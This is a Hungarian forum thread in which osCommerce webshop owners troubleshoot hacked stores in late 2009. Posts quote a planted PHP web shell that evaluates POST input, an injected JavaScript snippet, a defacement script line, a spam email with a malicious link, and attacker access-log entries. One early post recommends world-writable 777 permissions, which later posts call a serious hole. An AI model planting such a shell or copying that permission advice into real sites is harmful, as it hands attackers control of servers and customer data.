- Kiderült, mi található a CMF Phone 1 hátlapján
- Telekom mobilszolgáltatások
- Xiaomi Watch S1 - szép az idő
- Hetedik generációs Gorilla Glass készült a középkategóriának
- Xiaomi 14 Ultra - Leica hercegnő
- Huawei Mate 20 Pro - a mindenit!
- Apple iPhone 15 Pro Max - Attack on Titan
- Samsung Galaxy S23 és S23+ - ami belül van, az számít igazán
- Xiaomi 12X – kicsi a bors és hűvös
- Samsung Galaxy S22 Ultra - na, kinél van toll?
Hirdetés
-
Megérkezett Magyarországra a Samsung új OLED gaming monitora
ph Az Odyssey OLED G8 32 hüvelyes, sík OLED panellel dolgozik.
-
OneSport OT05 - finomhangolás
ma Mit hiányoltunk eddig a kedvező árfekvésű kínai bringákból a leginkább? A nyomatékszenzort. A OneSport újdonsága végre megkapta ezt a megoldást.
-
Retro Kocka Kuckó 2024
lo Megint eltelt egy esztendő, ezért mögyünk retrokockulni Vásárhelyre! Gyere velünk gyereknapon!
Új hozzászólás Aktív témák
-
-
vakondka
őstag
válasz
djsite #12002 üzenetére
Ingyenes tárhelyen én nem üzemeltetnék webáruházat,
de nem is vásárolnék ilyen webáruházban, ha én lennék a vevő...Ingyenes tárhelyeken a képfeltöltés sokszor speciális beállításokkal jár együtt,
ezeket a szolgáltató oldalán megtalálod, de legtöbbször elég, ha 777- es jogosultságot adsz az images mappának.https://toptarget.hu - Online Marketing Ügynökség
-
djsite
tag
Hát nem is webáruház lenne belőle, mert már egy kicsit át van szerkesztve, amolyan katalógus féle.
Egy másik áruházat tesztelés céljából feltettem egy ingyenes tárhelyre, de azzal nem volt ilyen probléma.
Természetesen az images mappának 777-es jogosultságot adtam, de semmi. Próbáltam az upload.php fájlt is lecserélni egy másikra, illetve kommentezni (//) a hibát, hogy ne jelenjen meg.
Érdekes, nem tudom, hogy mi lehet.
-
vakondka
őstag
válasz
djsite #12005 üzenetére
Akkor legalább áruld el hogy melyik ingyenes tárhelyen van,
mert enélkül igencsak nehéz segíteniA shop biztosan jó, nem ír ki semilyen hibákat magától...
...a gond a tárhellyel van...vagy azzal aki módosította a shop fájlokathttps://toptarget.hu - Online Marketing Ügynökség
-
djsite
tag
Hát megint ÉN
A tinyMCE nálam teljesen alap módon jelenik meg, amit azt láthatjátok a képen.
Ezt hol lehet beállítani, hogy "fullosan" jelenjen meg, mint a hivatalos oldalon???? http://tinymce.moxiecode.com/examples/full.php[ Szerkesztve ]
-
xXdensionXx
tag
válasz
djsite #12008 üzenetére
Szia djsite!
Hú de ismerős tán nem valamelyik MALA OSC verziót használod?
Ha igen akkor keress meg és szívesen segítek haveri alapon (ingyé')Ja egyébként
KELLEMES KARÁCSONYI ÜNNEPEKET ÉS BOLDOG ÚJ ÉVET KÍVÁNOK MINDEN KEDVES FÓRUMOZÓ TAGNAK MINDKÉT FÓRUMON!Üdv:
malahttp://www.wothungary.hu - WOThungary ModPakk - - - - - - - - - - - - - - - - - - - - - - - - ''A lustaság az evolució motorja!''
-
djsite
tag
Sziasztok!
Én és még pár regisztrált felhasználó kapott automatikus levelet, amit nem értek, hogy miért?
Return-Path: <clairebijou@s16.mediacenter.hu>
Delivered-To: nemethg79@freemail.hu
Received: (qmail 2360 invoked from network); 25 Dec 2009 10:50:56 +0100
Received: from s16.mediacenter.hu (195.70.48.70)
by fmx06.freemail.hu with SMTP; 25 Dec 2009 10:50:56 +0100
Received: from clairebijou by s16.mediacenter.hu with local (Exim 3.36 #1 (Debian))
id 1NO6oq-0001u6-00
for <nemethg79@freemail.hu>; Fri, 25 Dec 2009 10:50:48 +0100
To:<nemethg79@freemail.hu>
Subject: Giant choice solely NOW
From: info@www.clairebijou.hu
MIME-Version: 1.0
X-Mailer: osCommerce
Content-Type: text/plain; charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
Message-Id: <E1NO6oq-0001u6-00@s16.mediacenter.hu>
Sender: <clairebijou@s16.mediacenter.hu>
Date: Fri, 25 Dec 2009 10:50:48 +0100
X-Freemail: message scanned
Hey dude! I offer you great proposition.<br> <a href="http://hitman.net63.net/audio/fco2y8.php">Right Here!</a> <br> <style>{WWZ0EwFZGO9Pkv&pDBXE_S}lQ%</style>Valaki találkozott már ilyennel vagy hasonlóval???
Illetve a probléma mi lehet, hogy ilyeneket kapok és küld az áruház? -
djsite
tag
válasz
xXdensionXx #3657 üzenetére
Szia Mala!
Ez a meta tagos rész amit írtál, hogy az oldal címe a megjelenített termék neve legyen nekem nem megy. Mi lehet a hiba, mi nem jó? Elvileg minden stimmel
Köszönöm!
-
vakondka
őstag
válasz
djsite #12011 üzenetére
Szia,
ilyeneket én is kapok tőled minden nap...légyszi törölj ki a felhasználók listájából
Kíváncsi vagyok, hogy akkor is kapok-e még spam-et tőled.
Ha igen akkor szívás...mert ellopták az ügyfél adatbázisodat...ha nem, akkor viszont még lehet tenni valamit.
Mindenesetre szerintem először töröld ki ideiglenesen (1-2 napra) a contact_us.php fájlt, hátha azt hekkelik folyamatosan.
ha nem, akkor lehet hogy ftp-n keresztül feltörték a tárhelyet és beraktak egy spammelő php progit valahová.
Az admin mappában ki van törölve a file_manager.php fájl ??? (ez komoly biztonsági rés)https://toptarget.hu - Online Marketing Ügynökség
-
DiabloCorsa
őstag
-
DiabloCorsa
őstag
válasz
djsite #12015 üzenetére
Tanulságot megjegyezni!
Sűrűbben olvasni a fórumot.
Hozzáértőre bízni az osc telepítést.
Nem kísérletezni ingyenes tárhelyen.stb..stb..
Ha ellopták az adatbázisodat, akkor már semmit, minden regisztrál vásárlód an****zni fog és nem tudsz elleni tenni már semmit.
Az áruházad megtisztítható a még benne lévő fertőzéstől, ezt beszéljük meg privát.
További védelem megoldható, ha figyelsz rá.Többször írták itt, hogy a file_manager.php TÖRÖLNI KELL!!
Akkor hol voltál????
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
djsite
tag
válasz
DiabloCorsa #12016 üzenetére
Van egy fly.php fájlom a catalogban, az alábbi tartalommal és nem tudom, hogy ez mi.
test<?php @eval($_POST[code]);?>Lehet, hogy ez okoz valami?
-
Ro-bika
csendes tag
válasz
vakondka #12013 üzenetére
Sajnos "Karácsonyi ajándék" gyanánt valaki feltörte a mi oldalunkat is.
Belenéztem FTP-vel a log-ba és némi nyom látszik, pl.:
83.149.3.22 - - [25/Dec/2009:19:24:05 +0100] "POST /rss.php HTTP/1.1" 200 2802 "http://www.xxx.hu/rss.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"
83.149.3.22 - - [25/Dec/2009:19:24:07 +0100] "GET /rss.php HTTP/1.1" 200 6602 "http://www.xxx.hu/rss.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"Természetesen azonnal töröltem a "rss.php"-t, amit a cracker rakott fel!
[ Szerkesztve ]
-
DiabloCorsa
őstag
Feltettem ide pár hete egy hatásos megoldást árházunk védelmére.
Csupán 2 tag kérte, hogy neki is legyen.
Ingyenes volt, most is az.
Lényege az, hogy esetleges fertőzésről azonnal értesít, és megírja HOL történt a fertőzés, hiszen azt teljesen kivédeni szinte lehetetlen.
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
djsite
tag
válasz
DiabloCorsa #12022 üzenetére
Köszönöm a választ és a segítséget is.
Azért elég érdekes, hogy ezeket az információkat csak itt a fórumon találhatja meg az ember, illetve ha a file_manager.php-t le kell törölni az admin könyvtárból, akkor meg minek kell?
Tudom nem vagyok profi, de egy-két dolgot megtudok csinálni, erre viszont nem számítottam, hogy "megkörnyékeznek"
Kérdés: Ha az admin mappát átnevezem, akkor máshol nem kell beállítani, átírni semmit?
-
vakondka
őstag
válasz
djsite #12020 üzenetére
Van egy rossz hírem...
Egy ismerősöm pont most jelezte, hogy valószínűleg feltörték a shopját és ugyanazok a fájlok jelentek meg nála is mint nálad.
Nála 800 fájl fertőződött meg, bár nála sok bővítmény van...
...szóval ha ugyanaz a vírus, akkor nálad is sokkal több fájl fertőzött mint gondolnád.Nézd meg a js kiterjesztésű fájlokat a rendszeredben, valószínűleg ott lesz a végére beszúrva egy ilyen kezdetű javascript:
/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl
Ha ez ott van, akkor sajnos nálad is ugyanaz a helyzet, vagyis valószínűleg az összes php, html és js fájlba beszúrta magát a vírus valahová...
https://toptarget.hu - Online Marketing Ügynökség
-
Kolli7
tag
válasz
vakondka #12024 üzenetére
Sziasztok!
Nekem is van egy rossz hírem:
Az enyémet is feltörték, azt hiszem.
Az images mappában volt egy tempo.php file, amit megnéztem és a hetedik sorban ez állt:
print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";A tárhelyről már töröltem, szívesen elküldöm értelmezésre akit ez érdekel, mert fogalmam sincs, hogy mit csinál, de mintha a levelezésemmel lenne összefüggésben.
Pedig nekem törölve van a file_manager és az FTP kapu is be van kapcsolva.
Most mit tegyek??? -
xXdensionXx
tag
válasz
djsite #12012 üzenetére
Szia!
Keress meg skypon, priviben írtam a címem.
Megoldjuk, csak mond el hogyan és mit akarsz és együtt megoldjuk
A webshopok feltöréséről meg annyit, valószínűleg má' megin' ftp adatok ellopásával nyomultak be a shopokba, vagy esetleg valamelyik általatok (általunk) használt bővítésben van valami biztonsági rés.
Koli melyik boltodat nyomták fel?
Üdv:
http://www.wothungary.hu - WOThungary ModPakk - - - - - - - - - - - - - - - - - - - - - - - - ''A lustaság az evolució motorja!''
-
DiabloCorsa
őstag
válasz
Kolli7 #12025 üzenetére
Az images mappát nem lehet levédeni, (nehéz) mert abba szerkesztésnél képet töltünk fel, illetve a képeknek "futniuk kell" hogy megjeleníthetők legyenek ezért ez a leggyakoribb támadási mappa.
A Médiacenter belépési oldalán szeptember 7 óta olvasható a felhívás, hogy osc biztonsági résről és a file_managert ajánlott törölni.
Diablo. Ha gumira van szükséged ...
-
Kolli7
tag
válasz
xXdensionXx #12026 üzenetére
Szia Mala!
A kollart.hu-t törték fel.
Már írtam a MC-nek, hátha ők tudnak valamit.Szia Diablo!
A file_manager.php-t azonnal töröltem, amint szóltatok.
Az FTP kaput pedig egy percre sem kapcsoltam ki.
Megnéztem a tárhelyemet és nem találtam az elmúlt két hónapban illetéktelen behatolást.Szerintem a szerverről akartak (vagy már meg is tették) felhasználói adatokat kilistázni.
Legalábbis a file tartalma mintha erre utalna. De lehet, hogy tévedek.
Remélem nem sikerült a tervük.[ Szerkesztve ]
-
vakondka
őstag
válasz
Kolli7 #12025 üzenetére
Rengeteg féle feltörés van sajnos, szóval ahoz, hogy segítsünk az összes fájlodat látni kellene
Nem lehet, hogy régi verziós a webshopod ? MS2.2 ???
Mert abban annnyi biztonsági rés van, hogy a letörlésen kívül mást nem érdemes tenni vele...https://toptarget.hu - Online Marketing Ügynökség
-
Belba
őstag
válasz
djsite #12011 üzenetére
Jesszus!... Most olvasom a shop-feltöréseket!
Ahogy most olvasom vissza a történteket, beugrott, hogy én már hetek óta kapok egy magyar email-címről Spam-leveleket, ami azért is tűnt fel, mert ezzel a domain-el itt készített velünk együtt valaki egy shopot!!!
info@www.clairebijou.hu
=>> www.clairebijou.hu !!!
Pár napja írtam egy figyelmeztető levelet ennek a shopnak, szerintem feltörték a webshopját és a tudta nélkül küldözgetnek a nevében Spam-leveleket... (Vagy nem tudom.)
Most látom, hogy a te shopodban is ez a domain szerepel : ez nem lehet véletlen!!!
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
DiabloCorsa
őstag
válasz
Kolli7 #12028 üzenetére
Kolly!
Ahogy írtam, az images mappát igen nehéz megvédeni, hasonló támadásom volt nekem is. Beazonosítható MC-nél a támadó IP címe és a támadás pontos ideje, ha megnézed a tempo.php létrahozási dátumát és kikeresed milyen IP cím kapcsolat volt abban az időben a webszervernaplóban. Így visszakereshető, hogy az oldalra hogyan jutottak be, weben keresztül. Nem kell hozzá semmi ftp cím és ftp kapcsolat, sajnos.Ha megvan a cím kérem írd meg privátban a napló teljes sorát, megírom majd hogyan lehet kivédeni a következő ilyen támadást.
Küld el, illeszd be a privát levélbe a tempo.php tartalmát is, kód formában.
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
Belba
őstag
válasz
Ro-bika #12018 üzenetére
"...83.149.3.22 - - [25/Dec/2009:19:24:05 +0100] "POST /rss.php HTTP/1.1" 200 2802 "http://www.xxx.hu/rss.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"..."
==================================
83.149.3.22
Hostname: ip-83-149-3-22.nwgsm.ru
ISP: OJSC MegaFon
Organization: North-West Branch of OJSC MegaFon Network.
Proxy: None detected
Type: UnknownCountry: Russian Federation
State/Region: 66
City: Saint Petersburg
Latitude: 59.8944
Longitude: 30.2642===================================
Szentpétervári, orosz illetőségű a bepofátlankodó!
(A böngészőjébe is orosz nyelv van telepítve.)
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
Belba
őstag
válasz
DiabloCorsa #12031 üzenetére
Diablo!
Hol van ez a tempo.php fájl???...
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
vakondka
őstag
Az csak a feltört shopokban van, de ott is csak azokban amit pont ezzel a módszerrel törtek fel....ha jól értettem az images mappában kell keresni.
Mellesleg csak olyan mappába lehet írni, amire 777-es jogosultság van beállítva.
vannak akik az images mappára 777-et állítanak be maguknak, így már kívülről is fel lehet oda tölteni egy fájlt és lefuttatni, majd átvenni a teljes irányítást.A mappák normális attributum beállítása 755, az images mappán is !
Így is tökéletesen működnie kell adminról a kép feltöltésnek, kívülről viszont nem férhetnek hozzá, legalábbis írni nem tudnak bele és ez a lényeg.
Akinek csak akkor működik a képfeltöltés, ha 777-et állít be az images mappán, az váltson tárhely szolgáltatót, mert ez nagyon alap dolog...és komoly biztonsági rés.[ Szerkesztve ]
https://toptarget.hu - Online Marketing Ügynökség
-
DiabloCorsa
őstag
Ha nincs megfertőzve a shopod images mappája akkor sehol. Ha img.php-t találsz ott akkor szintén fertőzésed van. Az img.php tartalmát, védelmi módját már ismerem.
Tempo.php-vel még nem találkoztam, ezért érdekelne mi van benne, hogyan lehet kivédeni, hogy ne tudjon csinálni semmit, akkor sem ha már "bekerült" a shopunkba.
Diablo. Ha gumira van szükséged ...
-
Belba
őstag
Köszönöm, Diabló és Vakondka!
Én nem találtam a shopjaimban (egyelőre) sem image.php, sem tempo.php, sem fly.php fájlokat...
Komolyan, ezt nem is értem, hogy FTP-védelem, IP-védelem, átnevezett Admin-mappa ellenére hogyan tudnak beférkőzni a shopjainkba?!
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
vakondka
őstag
Nagyon egyszerűen. Amelyik mappára777-et állítasz be, azzal Te magad engedélyezed, hogy bárki bármit csinálhasson a mappán belül.
Nézd meg total commmanderben ftp vel egy próba mappán, hogy mit jelent a 777
Írás, olvasás, végrehajtás bárki (azt írja: világ) számára !Ellenben a 755 már nem ad írási jogosultságot, csak a "tulajdonos" számára.
Vagyis a már szerveren lévő szkriptek és ftp segítségével lehet ez esetben feltölteni oda fájlokat, normál http protokoll segítségével nem.https://toptarget.hu - Online Marketing Ügynökség
-
Pilu 007
tag
Kedves barátaim!
Sajnos - vagy szerencsére a sok tennivaló miatt, kicsit elhanyagoltam a fórumot, és mindent. Le is vontam a tanulságot, -felesleges kézzel lábbal kapálózni a haladás érdekében, az állam úgyis csak annyival gombol le jobban, hogy nehogy sikerüljön a tavalyi színvonalat(tisztességes úton) átlépni....
Szeretném megköszönni mindegyikőtöknek a segítségét, az építő jellegű hozzászólását, vagy bármit amivel 2es tudásom kipótoltátok, hogy az áruházam olyan maradjon amilyen most. Mind tudjátok kinek volt hozzá 1 perc köze is, nem részletezem, mert a fél stáblistát felsorolhatnám.
Szóval Köszönöm Nektek, és remélem ha 2010-ben is a homály borít be valamível kapcsolatban, számíthatok RÁTOK.
Boldog Új Évet Kívánok Nektek, És kedves Családtagjaitok Számára -politikamentesen, de tényleg bízva egy kicsit szebb jövőben!
Üdvözlettel: PILUhttp://www.webshop.munkaruhadiszkont.hu/ - - - - - http://www.munkaruhadiszkont.hu/
-
moat26
tag
válasz
DiabloCorsa #12040 üzenetére
Mindenkinek én is nagyon boldog új évet kívánok!
-
Marsy51
aktív tag
Boldog Új Évet Kívánok Mindenkinek!
Gyertek chatelni!
Marsy51 ("The truth is out there") osCommerce - Magyarország http://www.oscommerce-extra.hu
-
Belba
őstag
válasz
DiabloCorsa #12038 üzenetére
Kolli shopjában az elsők között lett átnevezve az Admin mappa, nincs nála weboldalról feltöltési lehetőség...
Jó lenne megfejteni, hogyan törik fel a shopokat, mert akkor tudnánk védekezni.
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
Phoere
csendes tag
Sziasztok!
Egy webáruházon dolgozom, amelyben külön kell kis- és nagyker ár. A vevő adataihoz került be a viszonteladói opció, ez alapján dől el, hogy melyik árat látja böngészéskor.
Elég sok mindenbe bele kellett nyúlnom, működik is majdnem minden, kivéve a bevásárló kosár. Ott nem sikerül a nagyker árat elővarázsolni. Egyszerűen eddig nem jöttem rá, hogy melyik fájlban kerül meghatározásra a final_price értéke.
Tudtok ebben segíteni?
Köszi és BUÉK!
Új hozzászólás Aktív témák
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- A fociról könnyedén, egy baráti társaságban
- EAFC 24
- Luck Dragon: Asszociációs játék. :)
- Futás, futópályák
- Projektor topic
- Eredeti játékok OFF topik
- Forza sorozat (Horizon/Motorsport)
- Milyen légkondit a lakásba?
- Friss játéktrióhoz készült az új GeForce driver
- További aktív témák...
- XFX GTS RX 580 8GB OC - eladó!
- Samsung Galaxy Watch 4 Classic 46mm, E-SIM, Kártyafüggetlen, 1 Év Garanciával
- Samsung Galaxy S21+ 5G 128GB, Kártyafüggetlen, 1 Év Garanciával
- Beats Studio 3 Wireless /// Makulátlan Állapot // Számla + 6 Hónap Garancia
- 1More ComfoBuds Pro Vezeték nélküli fejhallgató ZAJSZŰRÉSSEL /// ÚJ // Számla + garancia